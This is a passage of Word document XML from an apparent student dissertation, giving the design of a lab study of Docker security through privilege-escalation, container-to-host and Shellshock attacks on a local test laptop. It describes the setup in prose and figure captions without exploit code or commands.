      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="48E87960" w14:textId="2DBCC5B5" w:rsidR="00F95282" w:rsidRDefault="00C0772B" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc87032932"/>
      <w:r>
        <w:t>DESIGN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="106FABF8" w14:textId="49D772C0" w:rsidR="00182BA5" w:rsidRDefault="00F55A64" w:rsidP="00182BA5">
      <w:r>
        <w:t>This project aims to examine Docker security with regards to vulnerable applications, misconfigured or poisoned Docker images.</w:t>
      </w:r>
      <w:r w:rsidR="00A660E2">
        <w:t xml:space="preserve"> This project involves three different attacks to analyse Docker security utilising various approaches and tools, shown in figure 10.</w:t>
      </w:r>
      <w:r w:rsidR="00A24C2D">
        <w:t xml:space="preserve"> The project’s design is developed based on the information and data gained from the literature review.</w:t>
      </w:r>
      <w:r w:rsidR="001D76CE">
        <w:t xml:space="preserve"> The three types of attacks chosen were privilege escalation, container to host, and </w:t>
      </w:r>
      <w:r w:rsidR="00545D25">
        <w:t>vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="001D76CE">
        <w:t>, as they are the most common security threats used by threat actors</w:t>
      </w:r>
      <w:r w:rsidR="00613FFE">
        <w:t xml:space="preserve">, according to the study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1197972103"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D76CE">
        <w:t xml:space="preserve">. In addition, such attacks are inclusive </w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t>embody</w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve"> both inside and outside threats of</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve"> Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> The privilege escalation and container to host attacks illustrate the inside threats, while the vulnerable application demonstrates the outside threats </w:t>
      </w:r>
      <w:r w:rsidR="008E6322">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> the Docker ecosphere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A15DAA" w14:textId="5132DF36" w:rsidR="004B3B9F" w:rsidRDefault="00B42DD4" w:rsidP="00182BA5">
      <w:r>
        <w:t xml:space="preserve">The initial plan of the experiment was to </w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve">use gns3 software as a platform to execute the attacks; however, the gns3 crushes several times, and thus the author used an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve"> laptop with</w:t>
      </w:r>
      <w:r w:rsidR="00011A67">
        <w:t xml:space="preserve"> the latest</w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="003625AA">
        <w:t xml:space="preserve">engine </w:t>
      </w:r>
      <w:r w:rsidR="00011A67">
        <w:t xml:space="preserve">version 20.10.7 </w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t>packages installed.</w:t>
      </w:r>
      <w:r w:rsidR="004B3B9F">
        <w:t xml:space="preserve"> In this project, Docker is the central hub and is utilised to manage and run containers. The containers </w:t>
      </w:r>
      <w:r w:rsidR="008F6626">
        <w:t xml:space="preserve">communicate between each </w:t>
      </w:r>
      <w:r w:rsidR="008F6626">
        <w:lastRenderedPageBreak/>
        <w:t>other and the host machine through the default Docker network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="004B3B9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F1723">
        <w:t>For the privilege escalation and container to host attacks</w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>, the author built the</w:t>
      </w:r>
      <w:r w:rsidR="000F1723">
        <w:t xml:space="preserve"> images locally to create and run containers</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve">, while the last </w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>approach</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>utilises</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> an application vulnerable to shellshock downloaded from</w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E732632" w14:textId="3C9B63D0" w:rsidR="00133D1D" w:rsidRDefault="00E83F4F" w:rsidP="008C4AF1">
      <w:r>
        <w:t>The privilege attack utilise</w:t>
      </w:r>
      <w:r w:rsidR="00CA06E1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a single container</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D191C">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> unprivileged user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00CA06E1">
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the host machine</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> by exploiting vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>, as shown in figure 11. The image is built locally by a user with limited permission but is also part of the Docker group. The attacker exploits</w:t>
      </w:r>
      <w:r w:rsidR="00C779B5">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> intending to escape and access the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> laptop with root privilege. The author uses an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> laptop and Docker engine to carry out the attack. The Docker image is created based on </w:t>
      </w:r>
      <w:r w:rsidR="00FA6959">
        <w:t>a Linux distribution</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> wheezy </w:t>
      </w:r>
      <w:r w:rsidR="00FA6959">
        <w:t xml:space="preserve">because it is </w:t>
      </w:r>
      <w:r w:rsidR="00334805">
        <w:t>lightweight</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-549767324"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:instrText xml:space="preserve"> CITATION CPo14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[83]</w:t>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA6959">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9D3DE" w14:textId="3C5A6435" w:rsidR="001674E9" w:rsidRDefault="000A3056" w:rsidP="001674E9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A777F8A" wp14:editId="04E7F5D6">
            <wp:extent cx="4305300" cy="2585520"/>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05300" cy="2585520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24BB4A" w14:textId="34792C2A" w:rsidR="004D5F81" w:rsidRDefault="004D5F81" w:rsidP="004D5F81">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc86858602"/>
      <w:bookmarkStart w:id="100" w:name="_Toc86867492"/>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C915E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rivilege escalation </w:t>
      </w:r>
      <w:r w:rsidR="008D12E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> diagram.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="12A1A56E" w14:textId="6D4FD580" w:rsidR="0085202A" w:rsidRDefault="00140B25" w:rsidP="005E7CD4">
      <w:r>
        <w:t>On the other hand, t</w:t>
      </w:r>
      <w:r w:rsidR="00880D1F">
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> container to host approach design involves three containers with different setups and purposes to process and demonstrate the attack, as shown figure 12.</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>key objective</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> of this attack is to access the victim machine, in this case, the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> laptop, by exploiting the misconfigured Docker </w:t>
      </w:r>
      <w:r w:rsidR="003569AA">
        <w:t>image. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first two containers </w:t>
      </w:r>
      <w:r w:rsidR="00C915E6">
        <w:t xml:space="preserve">use very similar configurations, with the only difference is one supports SSH connection, and the other does </w:t>
      </w:r>
      <w:r w:rsidR="003569AA">
        <w:t>not. While the third container uses an image pulled from the Docker Hub and is based on Linux alpine distribution as it is lightweight and is used to install and run some packages</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="756492453"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:instrText xml:space="preserve"> CITATION Alp21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[84]</w:t>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003569AA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00747BA3">
        <w:t xml:space="preserve"> In addition, vim </w:t>
      </w:r>
      <w:r w:rsidR="00B452D9">
        <w:t xml:space="preserve">software </w:t>
      </w:r>
      <w:r w:rsidR="0085202A">
        <w:t xml:space="preserve">is used as a </w:t>
      </w:r>
      <w:r w:rsidR="00747BA3">
        <w:t xml:space="preserve">text editor </w:t>
      </w:r>
      <w:r w:rsidR="00B452D9">
        <w:t>to write a script for the first two containers.</w:t>
      </w:r>
      <w:r w:rsidR="0085202A">
        <w:t xml:space="preserve"> The containers are also enabled to communicate through </w:t>
      </w:r>
      <w:r w:rsidR="00682E88">
        <w:t xml:space="preserve">the default Docker0 bridge using their default IP address. The complete network diagram of the </w:t>
      </w:r>
      <w:r w:rsidR="004453CF">
        <w:t>Docker environment is illustrated in figure 12</w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t>, designed on draw.io</w:t>
      </w:r>
      <w:r w:rsidR="004453CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E9417" w14:textId="35D3AEC0" w:rsidR="00747BA3" w:rsidRDefault="006E2DD4" w:rsidP="00747BA3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B8C233" wp14:editId="3FEB5CE4">
            <wp:extent cx="4775200" cy="428625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75200" cy="4286250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47D67D" w14:textId="08F47FBA" w:rsidR="008D191C" w:rsidRDefault="00747BA3" w:rsidP="00575F94">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc86858603"/>
      <w:bookmarkStart w:id="102" w:name="_Toc86867493"/>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: network diagram of</w:t>
      </w:r>
      <w:r w:rsidR="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the connected containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="74B4904C" w14:textId="03D5F445" w:rsidR="001319A3" w:rsidRPr="001319A3" w:rsidRDefault="00575F94" w:rsidP="001319A3">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>primary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose of the last attack is to examine Docker security using a vulnerable application downloaded from the Docker Hub repository. Th</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DA1">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application runs a simple webpage and is </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>vulnerable to shellshock exploit</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DA1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D3F35" w:rsidRPr="00CE606F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellshock</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> is a Unix bash vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> allows an attacker to execute arbitrary commands either remotely or locally with high authority.</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> It was first released on 24 September 2014 and is now publicly disclosed on the CVE database as </w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t>-2014-6271</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="483825861"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:instrText xml:space="preserve"> CITATION CMa15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[85]</w:t>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003C1FC6">
        <w:t>. Therefore, in this attack</w:t>
      </w:r>
      <w:r w:rsidR="00F97655">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> the container with the vulnerable application is the victim</w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="00F97655">
        <w:t xml:space="preserve">rest two are alpine containers pulled from the Docker Hub </w:t>
      </w:r>
      <w:r w:rsidR="00C45CFA">
        <w:t>used as hijackers. Figure 12 illustrates the block diagram with the three containers running on the Docker host.</w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve"> This attack uses Netcat to monitor the traffic flow between the container and the victim container</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2097739229"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:instrText xml:space="preserve"> CITATION JPe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[86]</w:t>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve">. It also utilises tools used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A37DA2">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve"> the other two attacks, including Linux and Docker commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D202569" w14:textId="0CC46C5B" w:rsidR="004453CF" w:rsidRDefault="000D65AF" w:rsidP="001319A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F26354D" wp14:editId="02E85425">
            <wp:extent cx="4165600" cy="2566464"/>
            <wp:effectExtent l="0" t="0" r="6350" b="571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186454" cy="2579312"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF5100" w14:textId="414BCF25" w:rsidR="001319A3" w:rsidRDefault="001319A3" w:rsidP="001319A3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc86858604"/>
      <w:bookmarkStart w:id="104" w:name="_Toc86867494"/>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
